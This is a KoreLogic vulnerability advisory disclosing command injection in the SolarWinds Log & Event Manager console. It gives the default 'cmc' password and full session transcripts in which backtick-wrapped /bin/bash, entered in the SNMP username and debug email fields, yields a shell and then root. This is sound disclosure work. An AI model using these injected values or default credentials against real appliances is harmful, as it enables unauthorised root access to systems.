Vulnerability Description

Insufficient input validation in the management interface can be leveraged in order to execute arbitrary commands. This can lead to (root) shell access to the underlying operating system.

Technical Description

Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is “password”.

This report details two distinct attack vectors: the username input during SNMP setup and the destination email input during debug.

============ = SNMP =

This is accomplished by placing /bin/bash in the username input during SNMP server setup.

$ ssh cmc@1.3.3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6
  //////////////////////////////////////////////////
  ///       SolarWinds Log & Event Manager       ///
  ///                   management console       ///
  //////////////////////////////////////////////////

Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
Available commands:
  [ appliance ]  Network, System
  [ manager ]    Upgrade, Debug
  [ service ]    Restrictions, SSH, Snort
  [ ndepth ]     nDepth Configuration/Maintenance
    upgrade      Upgrade this Appliance
    admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
    import       Import a file that can be used from the Admin UI
    help         display this help
    exit         Exit
cmc > service
Available commands:
    startssh           Start the SSH Service
    stopssh            Stop the SSH Service
    restartssh         Restart the SSH Service
    restrictssh        Restrict Access to the SSH Service (by IP Address/hostname)
    unrestrictssh      Remove Restrictions on Access to the SSH Service
    snmp               Configure the SNMP Services
    copysnortrules     Copy Snort rules to floppy or network share
    loadsnortrules     Load Snort rules from floppy or network share
    loadsnortbackup    Load Snort rules from backup
    restartsnort       Restart the Snort Service
    enableflow         * Enable the flow Collection Service
    disableflow        Disable the flow Collection Service
    restrictconsole    Restrict Access to the Manager Console (GUI) by IP/hostname
    unrestrictconsole  Remove Restrictions on Access to the Console (GUI)
    restrictreports    Restrict Access to Reports by IP/hostname
    unrestrictreports  Remove Restrictions on Access to Reports
    stopopsec          Stop all running OPSEC LEA client connections
    help               display this help
    exit               Return to main menu

    NOTE: Commands with an asterisk (*) include an automatic manager service restart
cmc::service > snmp
SNMP Trap Logging Service is RUNNNING
Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y

SNMP Request Service is RUNNNING
Would you like to STOP the SNMP Request Service? [Y/n] Y

The SNMP Trap Logging Service is stopped.
The SNMP Request Service is stopped.
cmc::service > snmp
SNMP Trap Logging Service is DISABLED
Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y

SNMP Request Service is DISABLED
Would you like to ENABLE the SNMP Request Service? [Y/n] Y

Enter the port number to access SNMP on LEM (default: 161):
Enter the username to access SNMP on LEM (default: orion): `/bin/bash`
Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1):
Enter the authentication password (default: orion123):
Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128):
Enter the encryption key (default: orion123):

cmc@swi-lem:/usr/local/contego$

============ = Debug =

This is accomplished by placing /bin/bash in the destination email input during debug.

$ ssh cmc@1.3.3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6
  //////////////////////////////////////////////////
  ///       SolarWinds Log & Event Manager       ///
  ///                   management console       ///
  //////////////////////////////////////////////////

Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
Available commands:
  [ appliance ]  Network, System
  [ manager ]    Upgrade, Debug
  [ service ]    Restrictions, SSH, Snort
  [ ndepth ]     nDepth Configuration/Maintenance
    upgrade      Upgrade this Appliance
    admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
    import       Import a file that can be used from the Admin UI
    help         display this help
    exit         Exit
cmc > manager
Available commands:
    actortoolupgrade   * Upgrade your Manager's Actor Tools (CD/floppy)
    archiveconfig      Set your Manager Database Archive Schedule/Settings
    backupconfig       Set your Manager Backup Schedule/Settings
    cleanagentconfig   Reconfigure the agent on this box to a new manager
    configurendepth    * Configure the manager to use an nDepth server.
    confselfsignedcert * Configure the manager to use a self signed certificate
    dbrestart          Restart database
    debug              Send Debugging Information to an Alternate Address
    disabletls         Disable TLS for DB connections
    enabletls          Enable TLS for DB connections
    exportcert         Export the CA certificate for console
    exportcertrequest  Export a certificate request for signing by CA
    hotfix             Install LEM hotfix.
    importcert         * Import a certificate used for console communication
    importl4ca         * Import a CA of the other node in L4 configuration
    licenseupgrade     * Upgrade your Manager License (CD/floppy/network)
    logbackupconfig    Set your Manager Log Backup Schedule/Settings
    resetadmin         Reset the "admin" user password to default
    restart            * Restart Manager Service
    sensortoolupgrade  Upgrade your Manager and Agent Sensor Tools (CD/floppy)
    showlog            Show Manager Log File
    showmanagermem     Show the memory setting of SolarWinds manager
    start              Start Manager Service
    stop               * Stop Manager Service
    support            Send Debugging Information to Tech Support @trigeo.com
    togglehttp         * Enable or disable HTTP (port 80).
    viewsysinfo        Show information about machine and SolarWinds manager
    watchlog           Watch Manager Log File
    exit               Return to main menu

    NOTE: Commands with an asterisk (*) include an automatic manager service restart
cmc::manager > debug
Press <enter> to capture debugging information
You will need to provide an SMTP server or Windows File Sharing Credentials

Collecting general system information......UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
.e.sudo: unable to resolve host swi-lem
sudo: unable to resolve host swi-lem
.cat: /etc/hosts: No such file or directory
 done.
sudo: unable to resolve host swi-lem
E-Mail/Network share/Quit? (e/n/q) e
E-Mail/Network share/Quit? (e/n/q) e
Please enter the e-mail recipient:
   (e.g. support@trigeo.com)
> `/bin/bash >&2`
Is the e-mail address <`/bin/bash >&2`> correct? <Y/n> Y
Please enter the name this message should appear from
   (e.g. Someone Important)
> Test
Is the name Test correct? <Y/n> Y
Please enter the e-mail address this message should appear from
   (e.g. someone@trigeo.com)
> fake@localhost
Is the e-mail address fake@localhost correct? <Y/n> Y
Please enter the SMTP server you wish to send mail through
   (e.g. smtp.yournetwork.com)
> 127.0.0.1
Is the SMTP server 127.0.0.1 correct? <Y/n> Y
Please enter the name of your company
   (e.g. Initech, Post Falls branch or Veridian Dynamics)
> Test
Is the company Test correct? <Y/n> Y
Please enter a phone number where you can be reached
   (e.g. 509.555.1234)
> Test
Is the number Test correct? <Y/n> Y

--(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--
/tmp # id
uid=0(root) gid=0(root) groups=0(root)
--(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--

Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at:

https://thwack.solarwinds.com/thread/111223

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) and Hank Leininger of KoreLogic, Inc.

Proof of Concept

See 3. Technical Description

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt